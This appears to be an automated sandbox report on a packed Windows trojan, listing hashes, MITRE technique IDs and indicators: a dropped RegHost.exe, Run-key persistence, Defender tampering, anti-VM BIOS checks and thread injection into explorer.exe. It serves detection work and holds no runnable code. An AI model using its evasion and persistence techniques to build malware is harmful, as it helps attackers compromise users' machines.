b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

Analysis

max time kernel
158s
max time network
161s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
11-02-2022 05:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe
Size

5.2MB
MD5

a3578b5feeea4db90bcb5315f769e84d
SHA1

436a4a014f91c138ed9019c58c5c98ada78a7f4f
SHA256

b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b
SHA512

535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Score

10^/10

evasion persistence themida trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Executes dropped EXE 17 IoCs

Processes:

RegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exe

pid	process
3608	RegHost.exe
3972	RegHost.exe
1292	RegHost.exe
3152	RegHost.exe
3576	RegHost.exe
3776	RegHost.exe
1772	RegHost.exe
3632	RegHost.exe
1540	RegHost.exe
3492	RegHost.exe
1680	RegHost.exe
3500	RegHost.exe
3540	RegHost.exe
1572	RegHost.exe
224	RegHost.exe
564	RegHost.exe
2784	RegHost.exe

Checks BIOS information in registry 2 TTPs 34 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeb741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RegHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe

Themida packer 57 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/4052-130-0x00007FF73FC10000-0x00007FF74080D000-memory.dmp	themida
behavioral2/memory/4052-131-0x00007FF73FC10000-0x00007FF74080D000-memory.dmp	themida
behavioral2/memory/4052-132-0x00007FF73FC10000-0x00007FF74080D000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral2/memory/3608-139-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3608-140-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3608-141-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral2/memory/3972-147-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3972-148-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3972-149-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral2/memory/1292-155-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/1292-156-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/1292-157-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral2/memory/3152-163-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3152-164-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3152-165-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral2/memory/3576-171-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3576-172-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3576-173-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral2/memory/3776-179-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3776-180-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3776-181-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral2/memory/1772-187-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/1772-188-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/1772-189-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral2/memory/3632-195-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3632-196-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3632-197-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral2/memory/1540-203-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/1540-204-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/1540-205-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral2/memory/3492-211-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3492-212-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3492-213-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral2/memory/1680-219-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/1680-220-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/1680-221-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
behavioral2/memory/3500-227-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3500-228-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
behavioral2/memory/3500-229-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	themida

Adds Run key to start application 2 TTPs 17 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

RegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeb741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exeRegHost.exeRegHost.exeRegHost.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	RegHost.exe

Checks whether UAC is enabled 1 TTPs 18 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

RegHost.exeRegHost.exeRegHost.exeb741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegHost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 34 IoCs

Processes:

bfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exe

pid	process
3428	bfsvc.exe
3428	bfsvc.exe
2580	bfsvc.exe
2580	bfsvc.exe
2260	bfsvc.exe
2260	bfsvc.exe
3916	bfsvc.exe
3916	bfsvc.exe
544	bfsvc.exe
544	bfsvc.exe
2804	bfsvc.exe
2804	bfsvc.exe
1468	bfsvc.exe
1468	bfsvc.exe
2160	bfsvc.exe
2160	bfsvc.exe
2940	bfsvc.exe
2940	bfsvc.exe
3028	bfsvc.exe
3028	bfsvc.exe
868	bfsvc.exe
868	bfsvc.exe
2464	bfsvc.exe
2464	bfsvc.exe
1888	bfsvc.exe
1888	bfsvc.exe
1600	bfsvc.exe
1600	bfsvc.exe
1412	bfsvc.exe
1412	bfsvc.exe
3456	bfsvc.exe
3456	bfsvc.exe
3140	bfsvc.exe
3140	bfsvc.exe

Suspicious use of SetThreadContext 34 IoCs

Processes:

b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exe

description	pid	process	target process
PID 4052 set thread context of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 set thread context of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 3608 set thread context of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 set thread context of 2224	3608	RegHost.exe	explorer.exe
PID 3972 set thread context of 2260	3972	RegHost.exe	bfsvc.exe
PID 3972 set thread context of 2548	3972	RegHost.exe	explorer.exe
PID 1292 set thread context of 3916	1292	RegHost.exe	bfsvc.exe
PID 1292 set thread context of 3396	1292	RegHost.exe	explorer.exe
PID 3152 set thread context of 544	3152	RegHost.exe	bfsvc.exe
PID 3152 set thread context of 1232	3152	RegHost.exe	explorer.exe
PID 3576 set thread context of 2804	3576	RegHost.exe	bfsvc.exe
PID 3576 set thread context of 1324	3576	RegHost.exe	explorer.exe
PID 3776 set thread context of 1468	3776	RegHost.exe	bfsvc.exe
PID 3776 set thread context of 1308	3776	RegHost.exe	explorer.exe
PID 1772 set thread context of 2160	1772	RegHost.exe	bfsvc.exe
PID 1772 set thread context of 3048	1772	RegHost.exe	explorer.exe
PID 3632 set thread context of 2940	3632	RegHost.exe	bfsvc.exe
PID 3632 set thread context of 528	3632	RegHost.exe	explorer.exe
PID 1540 set thread context of 3028	1540	RegHost.exe	bfsvc.exe
PID 1540 set thread context of 1588	1540	RegHost.exe	explorer.exe
PID 3492 set thread context of 868	3492	RegHost.exe	bfsvc.exe
PID 3492 set thread context of 224	3492	RegHost.exe	explorer.exe
PID 1680 set thread context of 2464	1680	RegHost.exe	bfsvc.exe
PID 1680 set thread context of 3992	1680	RegHost.exe	explorer.exe
PID 3500 set thread context of 1888	3500	RegHost.exe	bfsvc.exe
PID 3500 set thread context of 1332	3500	RegHost.exe	explorer.exe
PID 3540 set thread context of 1600	3540	RegHost.exe	bfsvc.exe
PID 3540 set thread context of 2700	3540	RegHost.exe	explorer.exe
PID 1572 set thread context of 1412	1572	RegHost.exe	bfsvc.exe
PID 1572 set thread context of 3180	1572	RegHost.exe	explorer.exe
PID 224 set thread context of 3456	224	RegHost.exe	bfsvc.exe
PID 224 set thread context of 2288	224	RegHost.exe	explorer.exe
PID 564 set thread context of 3140	564	RegHost.exe	bfsvc.exe
PID 564 set thread context of 1588	564	RegHost.exe	explorer.exe

Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat	svchost.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MusNotifyIcon.exe

description	ioc	process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MusNotifyIcon.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MusNotifyIcon.exe

Modifies data under HKEY_USERS 45 IoCs

Processes:

svchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4024"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "2.597527"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132892057483293176"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0"	svchost.exe
